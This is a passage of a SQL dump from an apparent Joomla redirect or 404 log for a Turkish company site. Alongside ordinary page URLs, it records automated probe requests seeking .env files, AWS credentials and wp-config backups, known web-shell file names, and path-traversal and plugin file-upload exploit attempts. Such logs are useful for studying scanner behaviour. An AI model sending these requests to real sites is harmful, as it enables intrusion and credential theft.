00:00:00',301),(31736,'http://www.3s-technologies.com.tr/tr/joomla/images/pdf/spartan_wave_soldering_machines.pdf',NULL,'','',1,0,'2023-01-11 04:39:14','0000-00-00 00:00:00',301),(31737,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&itemid=56&lang=tr',NULL,'','',1,0,'2023-01-11 04:39:19','0000-00-00 00:00:00',301),(31738,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=45&itemid=29&lang=tr',NULL,'','',1,0,'2023-01-11 04:39:22','0000-00-00 00:00:00',301),(31739,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&itemid=155&lang=tr',NULL,'','',1,0,'2023-01-11 04:39:36','0000-00-00 00:00:00',301),(31740,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&itemid=145&lang=tr',NULL,'','',1,0,'2023-01-11 04:39:49','0000-00-00 00:00:00',301),(31741,'http://www.3s-technologies.com.tr/joomla/index.php?lang=en',NULL,'','',3,0,'2023-01-11 04:40:16','0000-00-00 00:00:00',301),(31742,'http://www.3s-technologies.com.tr/tr/index.php?option=anket_sonuclari&',NULL,'','',1,0,'2023-01-11 04:43:23','0000-00-00 00:00:00',301),(31743,'http://www.3s-technologies.com.tr/tr/index.php?option=com_rss&feed=rss0.91&no_html=1',NULL,'','',1,0,'2023-01-11 04:43:32','0000-00-00 00:00:00',301),(31744,'http://www.3s-technologies.com.tr/tr/index.php?option=com_frontpage&itemid=1',NULL,'','',1,0,'2023-01-11 04:43:34','0000-00-00 00:00:00',301),(31745,'http://www.3s-technologies.com.tr/tr/index.php?option=com_frosearch&itemid=5',NULL,'','',1,0,'2023-01-11 04:43:38','0000-00-00 00:00:00',301),(31746,'http://www.3s-technologies.com.tr/tr/index.php?option=com_rss&feed=rss1.0&no_html=1',NULL,'','',1,0,'2023-01-11 04:43:45','0000-00-00 00:00:00',301),(31747,'http://www.3s-technologies.com.tr/tr/index.php?option=com_rss&feed=opml&no_html=1',NULL,'','',1,0,'2023-01-11 04:43:48','0000-00-00 00:00:00',301),(31748,'http://www.3s-technologies.com.tr/tr/index.php?option=com_froregistration&task=lostpassword',NULL,'','',1,0,'2023-01-11 04:43:50','0000-00-00 00:00:00',301),(31749,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=10',NULL,'','',1,0,'2023-01-11 04:43:52','0000-00-00 00:00:00',301),(31750,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=14',NULL,'','',1,0,'2023-01-11 04:43:53','0000-00-00 00:00:00',301),(31751,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=16',NULL,'','',1,0,'2023-01-11 04:43:58','0000-00-00 00:00:00',301),(31752,'http://www.3s-technologies.com.tr/tr/index.php?option=com_rss&feed=atom0.3&no_html=1',NULL,'','',1,0,'2023-01-11 04:44:05','0000-00-00 00:00:00',301),(31753,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=2',NULL,'','',1,0,'2023-01-11 04:44:06','0000-00-00 00:00:00',301),(31754,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=3',NULL,'','',1,0,'2023-01-11 04:44:07','0000-00-00 00:00:00',301),(31755,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=28',NULL,'','',1,0,'2023-01-11 04:44:08','0000-00-00 00:00:00',301),(31756,'http://www.3s-technologies.com.tr/tr/index.php?option=com_rss&feed=rss2.0&no_html=1',NULL,'','',1,0,'2023-01-11 04:44:10','0000-00-00 00:00:00',301),(31757,'http://www.3s-technologies.com.tr/tr/index.php?option=com_registration&task=lostpassword',NULL,'','',1,0,'2023-01-11 04:44:12','0000-00-00 00:00:00',301),(31758,'http://www.3s-technologies.com.tr/tr/index.php?option=anket_sonuclari&id=1',NULL,'','',1,0,'2023-01-11 04:44:16','0000-00-00 00:00:00',301),(31759,'http://www.3s-technologies.com.tr/tr/index.php?option=com_froregistration&task=register',NULL,'','',1,0,'2023-01-11 04:44:18','0000-00-00 00:00:00',301),(31760,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=46',NULL,'','',1,0,'2023-01-11 04:44:18','0000-00-00 00:00:00',301),(31761,'http://www.3s-technologies.com.tr/tr/index.php?option=com_registration&task=register',NULL,'','',1,0,'2023-01-11 04:44:19','0000-00-00 00:00:00',301),(31762,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=34',NULL,'','',1,0,'2023-01-11 04:44:21','0000-00-00 00:00:00',301),(31763,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=13',NULL,'','',1,0,'2023-01-11 04:44:22','0000-00-00 00:00:00',301),(31764,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=48',NULL,'','',1,0,'2023-01-11 04:44:23','0000-00-00 00:00:00',301),(31765,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=15',NULL,'','',1,0,'2023-01-11 04:44:24','0000-00-00 00:00:00',301),(31766,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=1',NULL,'','',1,0,'2023-01-11 04:44:30','0000-00-00 00:00:00',301),(31767,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=30',NULL,'','',1,0,'2023-01-11 04:44:30','0000-00-00 00:00:00',301),(31768,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=58',NULL,'','',1,0,'2023-01-11 04:44:31','0000-00-00 00:00:00',301),(31769,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=29',NULL,'','',1,0,'2023-01-11 04:44:32','0000-00-00 00:00:00',301),(31770,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=47',NULL,'','',1,0,'2023-01-11 04:44:33','0000-00-00 00:00:00',301),(31771,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=33',NULL,'','',1,0,'2023-01-11 04:44:36','0000-00-00 00:00:00',301),(31772,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=5',NULL,'','',1,0,'2023-01-11 04:44:37','0000-00-00 00:00:00',301),(31773,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=4',NULL,'','',1,0,'2023-01-11 04:44:39','0000-00-00 00:00:00',301),(31774,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=49',NULL,'','',1,0,'2023-01-11 04:44:45','0000-00-00 00:00:00',301),(31775,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=50',NULL,'','',1,0,'2023-01-11 04:44:47','0000-00-00 00:00:00',301),(31776,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=8',NULL,'','',1,0,'2023-01-11 04:44:51','0000-00-00 00:00:00',301),(31777,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=6',NULL,'','',1,0,'2023-01-11 04:44:54','0000-00-00 00:00:00',301),(31778,'http://www.3s-technologies.com.tr/tr/index.php?option=kalite_politikamiz',NULL,'','',1,0,'2023-01-11 04:44:56','0000-00-00 00:00:00',301),(31779,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=7',NULL,'','',1,0,'2023-01-11 04:44:59','0000-00-00 00:00:00',301),(31780,'http://www.3s-technologies.com.tr/tr/index.php?option=urunler&id=9',NULL,'','',1,0,'2023-01-11 04:45:06','0000-00-00 00:00:00',301),(31781,'http://www.3s-technologies.com.tr/tr/index.php?option=misyon',NULL,'','',1,0,'2023-01-11 04:45:06','0000-00-00 00:00:00',301),(31782,'http://www.3s-technologies.com.tr/tr/index.php?option=iletisim',NULL,'','',1,0,'2023-01-11 04:45:08','0000-00-00 00:00:00',301),(31783,'http://www.3s-technologies.com.tr/tr/index.php?option=ik',NULL,'','',1,0,'2023-01-11 04:45:09','0000-00-00 00:00:00',301),(31784,'http://www.3s-technologies.com.tr/tr/index.php?option=ilkeler',NULL,'','',1,0,'2023-01-11 04:45:11','0000-00-00 00:00:00',301),(31785,'http://www.3s-technologies.com.tr/tr/index.php?option=site_haritasi',NULL,'','',1,0,'2023-01-11 04:45:13','0000-00-00 00:00:00',301),(31786,'http://www.3s-technologies.com.tr/tr/index.php?option=vizyon',NULL,'','',1,0,'2023-01-11 04:45:14','0000-00-00 00:00:00',301),(31787,'http://www.3s-technologies.com.tr/tr/templates/corporate/css/template_css.css',NULL,'','',2,0,'2023-01-11 04:45:24','0000-00-00 00:00:00',301),(31788,'http://www.3s-technologies.com.tr/tr/usr/hosts/domains/3s-technologies/www.3s-technologies.com.tr/httpdocs/tr/index.php',NULL,'','',1,0,'2023-01-11 04:46:42','0000-00-00 00:00:00',301),(31789,'http://www.3s-technologies.com.tr/en/wikindex.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'www.bing.com','',2,0,'2023-01-11 11:09:05','0000-00-00 00:00:00',301),(31790,'http://www.3s-technologies.com.tr/en/wp-content/mu-plugins-old/index.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'www.bing.com','',2,0,'2023-01-11 11:09:06','0000-00-00 00:00:00',301),(31791,'http://www.3s-technologies.com.tr/en/lock360.php?daksldlkdsadas=1',NULL,'www.bing.com','',2,0,'2023-01-11 11:09:11','0000-00-00 00:00:00',301),(31792,'http://www.3s-technologies.com.tr/en/xmrlpc.php?daksldlkdsadas=1',NULL,'www.bing.com','',2,0,'2023-01-11 11:09:16','0000-00-00 00:00:00',301),(31793,'http://www.3s-technologies.com.tr/en/xmlrpcs.php?daksldlkdsadas=1',NULL,'www.bing.com','',2,0,'2023-01-11 11:09:25','0000-00-00 00:00:00',301),(31794,'http://www.3s-technologies.com.tr/en/wp-admin.php?daksldlkdsadas=1',NULL,'www.bing.com','',2,0,'2023-01-11 11:09:29','0000-00-00 00:00:00',301),(31795,'http://www.3s-technologies.com.tr/en/qindex.php?daksldlkdsadas=1',NULL,'www.bing.com','',2,0,'2023-01-11 11:09:38','0000-00-00 00:00:00',301),(31796,'http://www.3s-technologies.com.tr/en/css.php',NULL,'www.bing.com','',2,0,'2023-01-11 11:10:19','0000-00-00 00:00:00',301),(31797,'http://www.3s-technologies.com.tr/en/xindex.php',NULL,'www.bing.com','',2,0,'2023-01-11 11:11:37','0000-00-00 00:00:00',301),(31798,'http://3s-technologies.com.tr/tr/sites/all/modules/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',3,0,'2023-01-12 01:12:42','0000-00-00 00:00:00',301),(31799,'http://3s-technologies.com.tr/en/wp-includes/css/buttons.css',NULL,'http://3s-technologies.com.tr/wp-includes/css/buttons.css','',3,0,'2023-01-12 10:36:12','0000-00-00 00:00:00',301),(31800,'https://3s-technologies.com.tr/en/public/client/planinfo',NULL,'','',2,0,'2023-01-14 09:30:56','0000-00-00 00:00:00',301),(31801,'https://3s-technologies.com.tr/en/_profiler/phpinfo',NULL,'','',9,0,'2023-01-14 09:30:57','0000-00-00 00:00:00',301),(31802,'https://3s-technologies.com.tr/en/phpinfo.php',NULL,'','',20,0,'2023-01-14 09:30:57','0000-00-00 00:00:00',301),(31803,'https://3s-technologies.com.tr/en/info.php',NULL,'','',21,0,'2023-01-14 09:30:58','0000-00-00 00:00:00',301),(31804,'https://3s-technologies.com.tr/en/aws.yml',NULL,'','',3,0,'2023-01-14 09:30:58','0000-00-00 00:00:00',301),(31805,'https://3s-technologies.com.tr/en/.env.bak',NULL,'','',8,0,'2023-01-14 09:30:59','0000-00-00 00:00:00',301),(31806,'https://3s-technologies.com.tr/en/config/aws.yml',NULL,'','',3,0,'2023-01-14 09:30:59','0000-00-00 00:00:00',301),(31807,'https://3s-technologies.com.tr/en/symfony/_profiler/phpinfo',NULL,'','',2,0,'2023-01-14 09:31:00','0000-00-00 00:00:00',301),(31808,'https://3s-technologies.com.tr/en/phpinfo',NULL,'','',9,0,'2023-01-14 09:31:00','0000-00-00 00:00:00',301),(31809,'https://3s-technologies.com.tr/en/login?pp=enable&pp=env',NULL,'','',1,0,'2023-01-14 09:31:00','0000-00-00 00:00:00',301),(31810,'https://3s-technologies.com.tr/en/.aws/credentials',NULL,'','',10,0,'2023-01-14 09:31:02','0000-00-00 00:00:00',301),(31811,'https://3s-technologies.com.tr/en/config.js',NULL,'','',7,0,'2023-01-14 09:31:02','0000-00-00 00:00:00',301),(31812,'https://3s-technologies.com.tr/en/helpers/utility.js',NULL,'','',2,0,'2023-01-14 09:31:03','0000-00-00 00:00:00',301),(31813,'https://3s-technologies.com.tr/en/config/config.json',NULL,'','',2,0,'2023-01-14 09:31:03','0000-00-00 00:00:00',301),(31814,'https://3s-technologies.com.tr/en/public/.env',NULL,'','',2,0,'2023-01-14 09:31:04','0000-00-00 00:00:00',301),(31815,'https://3s-technologies.com.tr/en/laravel/.env',NULL,'','',4,0,'2023-01-14 09:31:04','0000-00-00 00:00:00',301),(31816,'https://3s-technologies.com.tr/en/laravel/core/.env',NULL,'','',2,0,'2023-01-14 09:31:04','0000-00-00 00:00:00',301),(31817,'https://3s-technologies.com.tr/en/beta/.env',NULL,'','',6,0,'2023-01-14 09:31:05','0000-00-00 00:00:00',301),(31818,'https://3s-technologies.com.tr/en/kyc/.env',NULL,'','',2,0,'2023-01-14 09:31:05','0000-00-00 00:00:00',301),(31819,'https://3s-technologies.com.tr/en/admin/.env',NULL,'','',3,0,'2023-01-14 09:31:06','0000-00-00 00:00:00',301),(31820,'https://3s-technologies.com.tr/en/prod/.env',NULL,'','',4,0,'2023-01-14 09:31:06','0000-00-00 00:00:00',301),(31821,'https://3s-technologies.com.tr/en/api/.env',NULL,'','',7,0,'2023-01-14 09:31:07','0000-00-00 00:00:00',301),(31822,'https://3s-technologies.com.tr/en/wp-config.php.bak',NULL,'','',3,0,'2023-01-14 09:31:07','0000-00-00 00:00:00',301),(31823,'https://3s-technologies.com.tr/en/wp-config.php.old',NULL,'','',3,0,'2023-01-14 09:31:08','0000-00-00 00:00:00',301),(31824,'https://3s-technologies.com.tr/en/v0uw0zspu6olhmrivwn/f5tlcuddapnf0y',NULL,'','',1,0,'2023-01-14 11:45:41','0000-00-00 00:00:00',301),(31825,'https://3s-technologies.com.tr/en/home-en/79-english-uk/88-eko-cnc-en',NULL,'','',5,0,'2023-01-16 06:24:34','0000-00-00 00:00:00',301),(31826,'https://3s-technologies.com.tr/tr/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../mmefikbrn.php',NULL,'','',1,0,'2023-01-16 16:54:49','0000-00-00 00:00:00',301),(31827,'http://3s-technologies.com.tr/tr/components/mmefikbrn.php',NULL,'','',1,0,'2023-01-16 16:54:49','0000-00-00 00:00:00',301),(31828,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/modules/content-modules/most-read/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',1,0,'2023-01-17 21:59:46','0000-00-00 00:00:00',301),(31829,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/beez-2/home-page-beez-2/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',1,0,'2023-01-18 01:41:56','0000-00-00 00:00:00',301),(31830,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-stab/index.php',NULL,'','',17,0,'2023-01-18 02:05:33','0000-00-00 00:00:00',301),(31831,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic/home-page-atomic/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',1,0,'2023-01-18 03:33:59','0000-00-00 00:00:00',301),(31832,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/home-en/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',2,0,'2023-01-18 08:05:08','0000-00-00 00:00:00',301),(31833,'https://3s-technologies.com.tr/tr/blog/license.txt',NULL,'https://3s-technologies.com.tr/blog/license.txt','',1,0,'2023-01-18 08:19:26','0000-00-00 00:00:00',301),(31834,'https://3s-technologies.com.tr/tr/blogs/license.txt',NULL,'https://3s-technologies.com.tr/blogs/license.txt','',1,0,'2023-01-18 11:24:51','0000-00-00 00:00:00',301),(31835,'https://3s-technologies.com.tr/tr/arx/license.txt',NULL,'https://3s-technologies.com.tr/arx/license.txt','',1,0,'2023-01-18 20:44:43','0000-00-00 00:00:00',301),(31836,'https://3s-technologies.com.tr/tr/temp/license.txt',NULL,'https://3s-technologies.com.tr/temp/license.txt','',1,0,'2023-01-19 08:49:17','0000-00-00 00:00:00',301),(31837,'https://3s-technologies.com.tr/tr/shop/license.txt',NULL,'https://3s-technologies.com.tr/shop/license.txt','',1,0,'2023-01-19 11:57:29','0000-00-00 00:00:00',301),(31838,'http://3s-technologies.com.tr/tr/wp-content/plugins/sid/xleet.php',NULL,'','',1,0,'2023-01-19 17:11:47','0000-00-00 00:00:00',301),(31839,'http://3s-technologies.com.tr/tr/.admin.php',NULL,'','',2,0,'2023-01-19 17:11:47','0000-00-00 00:00:00',301),(31840,'http://3s-technologies.com.tr/tr/wp-content/plugins/upds/xleet.php',NULL,'','',1,0,'2023-01-19 17:11:47','0000-00-00 00:00:00',301),(31841,'http://3s-technologies.com.tr/tr/bala.php',NULL,'','',24,0,'2023-01-19 22:59:20','0000-00-00 00:00:00',301),(31842,'http://3s-technologies.com.tr/tr/.wp-themes.php',NULL,'','',1,0,'2023-01-19 22:59:22','0000-00-00 00:00:00',301),(31843,'http://3s-technologies.com.tr/tr/oldindex.php',NULL,'','',2,0,'2023-01-19 22:59:22','0000-00-00 00:00:00',301),(31844,'http://3s-technologies.com.tr/tr/inputs1122.php',NULL,'','',2,0,'2023-01-19 22:59:22','0000-00-00 00:00:00',301),(31845,'http://3s-technologies.com.tr/tr/511.php',NULL,'','',1,0,'2023-01-19 22:59:24','0000-00-00 00:00:00',301),(31846,'http://3s-technologies.com.tr/tr/.wp-back.php',NULL,'','',1,0,'2023-01-19 22:59:24','0000-00-00 00:00:00',301),(31847,'https://3s-technologies.com.tr/tr/0/license.txt',NULL,'https://3s-technologies.com.tr/0/license.txt','',1,0,'2023-01-20 12:08:13','0000-00-00 00:00:00',301),(31848,'https://3s-technologies.com.tr/tr/00/license.txt',NULL,'https://3s-technologies.com.tr/00/license.txt','',1,0,'2023-01-20 15:35:22','0000-00-00 00:00:00',301),(31849,'http://mail.3s-technologies.com.tr/tr/owa',NULL,'','',7,0,'2023-01-20 16:17:47','0000-00-00 00:00:00',301),(31850,'http://3s-technologies.com.tr/tr/owa',NULL,'','',6,0,'2023-01-20 16:18:01','0000-00-00 00:00:00',301),(31851,'https://3s-technologies.com.tr/tr/01/license.txt',NULL,'https://3s-technologies.com.tr/01/license.txt','',1,0,'2023-01-20 19:11:38','0000-00-00 00:00:00',301),(31852,'https://3s-technologies.com.tr/tr/02/license.txt',NULL,'https://3s-technologies.com.tr/02/license.txt','',1,0,'2023-01-20 22:48:23','0000-00-00 00:00:00',301),(31853,'https://3s-technologies.com.tr/tr/03/license.txt',NULL,'https://3s-technologies.com.tr/03/license.txt','',1,0,'2023-01-21 02:28:47','0000-00-00 00:00:00',301),(31854,'https://3s-technologies.com.tr/tr/100/license.txt',NULL,'https://3s-technologies.com.tr/100/license.txt','',1,0,'2023-01-21 13:43:56','0000-00-00 00:00:00',301),(31855,'https://3s-technologies.com.tr/tr/1000/license.txt',NULL,'https://3s-technologies.com.tr/1000/license.txt','',1,0,'2023-01-21 17:35:23','0000-00-00 00:00:00',301),(31856,'https://3s-technologies.com.tr/tr/101/license.txt',NULL,'https://3s-technologies.com.tr/101/license.txt','',1,0,'2023-01-21 21:27:48','0000-00-00 00:00:00',301),(31857,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpputty/wpputty.php',NULL,'','',5,0,'2023-01-22 00:46:55','0000-00-00 00:00:00',301),(31858,'https://3s-technologies.com.tr/tr/102/license.txt',NULL,'https://3s-technologies.com.tr/102/license.txt','',1,0,'2023-01-22 01:26:14','0000-00-00 00:00:00',301),(31859,'https://3s-technologies.com.tr/tr/1998/license.txt',NULL,'https://3s-technologies.com.tr/1998/license.txt','',1,0,'2023-01-22 09:32:28','0000-00-00 00:00:00',301),(31860,'http://3s-technologies.com.tr/en/gbyurfrp.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-01-22 13:21:15','0000-00-00 00:00:00',301),(31861,'https://3s-technologies.com.tr/en/reqyiyhf.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-01-22 13:21:16','0000-00-00 00:00:00',301),(31862,'https://3s-technologies.com.tr/tr/1999/license.txt',NULL,'https://3s-technologies.com.tr/1999/license.txt','',1,0,'2023-01-22 13:38:07','0000-00-00 00:00:00',301),(31863,'http://www.3s-technologies.com.tr//mt/mt-xmlrpc.cgi',NULL,'','',1,0,'2023-01-22 20:39:32','0000-00-00 00:00:00',301),(31864,'http://www.3s-technologies.com.tr//cgi_bin/mt/mt-xmlrpc.cgi',NULL,'','',1,0,'2023-01-22 20:39:33','0000-00-00 00:00:00',301),(31865,'http://www.3s-technologies.com.tr//cgi/mt/mt-xmlrpc.cgi',NULL,'','',1,0,'2023-01-22 20:39:36','0000-00-00 00:00:00',301),(31866,'http://www.3s-technologies.com.tr//jp/mt/mt-xmlrpc.cgi',NULL,'','',1,0,'2023-01-22 20:39:37','0000-00-00 00:00:00',301),(31867,'http://www.3s-technologies.com.tr//blog/mt/mt-xmlrpc.cgi',NULL,'','',1,0,'2023-01-22 20:39:50','0000-00-00 00:00:00',301),(31868,'https://3s-technologies.com.tr/tr/2/license.txt',NULL,'https://3s-technologies.com.tr/2/license.txt','',1,0,'2023-01-22 21:56:10','0000-00-00 00:00:00',301),(31869,'http://www.3s-technologies.com.tr/tr/wp-includes/css/modules.php',NULL,'','',11,0,'2023-01-23 01:59:10','0000-00-00 00:00:00',301),(31870,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/upspy/index.php',NULL,'','',10,0,'2023-01-23 01:59:16','0000-00-00 00:00:00',301),(31871,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/ubh/index.php',NULL,'','',10,0,'2023-01-23 01:59:19','0000-00-00 00:00:00',301),(31872,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/vwcleanerplugin/bump.php?cache',NULL,'','',11,0,'2023-01-23 01:59:23','0000-00-00 00:00:00',301),(31873,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/xichang/x.php?xi',NULL,'','',10,0,'2023-01-23 01:59:27','0000-00-00 00:00:00',301),(31874,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/html404/index.html',NULL,'','',10,0,'2023-01-23 01:59:31','0000-00-00 00:00:00',301),(31875,'http://www.3s-technologies.com.tr/tr/wp-admin/shapes.php',NULL,'','',11,0,'2023-01-23 01:59:35','0000-00-00 00:00:00',301),(31876,'http://www.3s-technologies.com.tr/tr/wp-content/uploads',NULL,'','',11,0,'2023-01-23 02:00:02','0000-00-00 00:00:00',301),(31877,'http://www.3s-technologies.com.tr/tr/wp-admin/network/wp-footer.php',NULL,'','',10,0,'2023-01-23 02:00:14','0000-00-00 00:00:00',301),(31878,'http://www.3s-technologies.com.tr/tr/wp-info.php',NULL,'','',14,0,'2023-01-23 02:00:17','0000-00-00 00:00:00',301),(31879,'http://www.3s-technologies.com.tr/tr/wp-content/vuln.php',NULL,'','',10,0,'2023-01-23 02:00:18','0000-00-00 00:00:00',301),(31880,'http://www.3s-technologies.com.tr/tr/upel.php',NULL,'','',10,0,'2023-01-23 02:00:20','0000-00-00 00:00:00',301),(31881,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/ppus/up.php',NULL,'','',10,0,'2023-01-23 02:00:22','0000-00-00 00:00:00',301),(31882,'http://www.3s-technologies.com.tr/tr/new_license.php',NULL,'','',10,0,'2023-01-23 02:00:32','0000-00-00 00:00:00',301),(31883,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/theme-configurator/mini.php',NULL,'','',10,0,'2023-01-23 02:00:35','0000-00-00 00:00:00',301),(31884,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/widget-logic/mini.php',NULL,'','',10,0,'2023-01-23 02:00:38','0000-00-00 00:00:00',301),(31885,'http://www.3s-technologies.com.tr/tr/uploads',NULL,'','',11,0,'2023-01-23 02:03:09','0000-00-00 00:00:00',301),(31886,'http://www.3s-technologies.com.tr/tr/img',NULL,'','',10,0,'2023-01-23 02:03:11','0000-00-00 00:00:00',301),(31887,'http://www.3s-technologies.com.tr/tr/upload',NULL,'','',10,0,'2023-01-23 02:03:13','0000-00-00 00:00:00',301),(31888,'http://www.3s-technologies.com.tr/tr/gallery',NULL,'','',10,0,'2023-01-23 02:03:15','0000-00-00 00:00:00',301),(31889,'http://www.3s-technologies.com.tr/tr/files',NULL,'','',10,0,'2023-01-23 02:03:17','0000-00-00 00:00:00',301),(31890,'http://www.3s-technologies.com.tr/tr/pdf',NULL,'','',10,0,'2023-01-23 02:03:21','0000-00-00 00:00:00',301),(31891,'http://www.3s-technologies.com.tr/tr/docs',NULL,'','',10,0,'2023-01-23 02:03:25','0000-00-00 00:00:00',301),(31892,'https://3s-technologies.com.tr/tr/200/license.txt',NULL,'https://3s-technologies.com.tr/200/license.txt','',1,0,'2023-01-23 06:21:14','0000-00-00 00:00:00',301),(31893,'https://3s-technologies.com.tr/tr/2000/license.txt',NULL,'https://3s-technologies.com.tr/2000/license.txt','',1,0,'2023-01-23 10:41:07','0000-00-00 00:00:00',301),(31894,'https://3s-technologies.com.tr/tr/2001/license.txt',NULL,'https://3s-technologies.com.tr/2001/license.txt','',1,0,'2023-01-23 15:05:55','0000-00-00 00:00:00',301),(31895,'https://3s-technologies.com.tr/tr/2002/license.txt',NULL,'https://3s-technologies.com.tr/2002/license.txt','',1,0,'2023-01-23 19:29:44','0000-00-00 00:00:00',301),(31896,'https://3s-technologies.com.tr/tr/2003/license.txt',NULL,'https://3s-technologies.com.tr/2003/license.txt','',1,0,'2023-01-23 23:59:33','0000-00-00 00:00:00',301),(31897,'https://3s-technologies.com.tr/tr/2004/license.txt',NULL,'https://3s-technologies.com.tr/2004/license.txt','',1,0,'2023-01-24 04:28:28','0000-00-00 00:00:00',301),(31898,'https://3s-technologies.com.tr/tr/2005/license.txt',NULL,'https://3s-technologies.com.tr/2005/license.txt','',1,0,'2023-01-24 09:04:11','0000-00-00 00:00:00',301),(31899,'http://www.3s-technologies.com.tr//wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:31','0000-00-00 00:00:00',301),(31900,'http://www.3s-technologies.com.tr/en/wp-content/plugins/dzs-zoomsounds/a57bze8931.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:33','0000-00-00 00:00:00',301),(31901,'http://www.3s-technologies.com.tr//wp-content/plugins/ioptimizations/ioptimizes.php?hamlorszd',NULL,'www.google.com','',1,0,'2023-01-24 11:32:35','0000-00-00 00:00:00',301),(31902,'http://www.3s-technologies.com.tr/en/wp-content/plugins/ioptimizations/a57bze8931.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:36','0000-00-00 00:00:00',301),(31903,'http://www.3s-technologies.com.tr//wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',1,0,'2023-01-24 11:32:36','0000-00-00 00:00:00',301),(31904,'http://www.3s-technologies.com.tr/en/wp-content/plugins/ioptimization/a57bze8931.php',NULL,'www.google.com','',2,0,'2023-01-24 11:32:37','0000-00-00 00:00:00',301),(31905,'http://www.3s-technologies.com.tr//wp-content/plugins/wp-engine-module/wp-engine.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:38','0000-00-00 00:00:00',301),(31906,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-engine-module/a57bze8931.php',NULL,'www.google.com','',2,0,'2023-01-24 11:32:39','0000-00-00 00:00:00',301),(31907,'http://www.3s-technologies.com.tr/en/wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:41','0000-00-00 00:00:00',301),(31908,'http://www.3s-technologies.com.tr//wp-content/plugins/apikey/apikey.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:42','0000-00-00 00:00:00',301),(31909,'http://www.3s-technologies.com.tr/en/wp-content/plugins/apikey/a57bze8931.php',NULL,'www.google.com','',2,0,'2023-01-24 11:32:44','0000-00-00 00:00:00',301),(31910,'http://www.3s-technologies.com.tr/en/wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:46','0000-00-00 00:00:00',301),(31911,'http://www.3s-technologies.com.tr//wp-content/plugins/formcraft/file-upload/server/php/',NULL,'www.google.com','',1,0,'2023-01-24 11:32:47','0000-00-00 00:00:00',301),(31912,'http://www.3s-technologies.com.tr/en/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:47','0000-00-00 00:00:00',301),(31913,'http://www.3s-technologies.com.tr/en/wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:49','0000-00-00 00:00:00',301),(31914,'http://www.3s-technologies.com.tr/en/abruzi.php4',NULL,'www.google.com','',1,0,'2023-01-24 11:32:51','0000-00-00 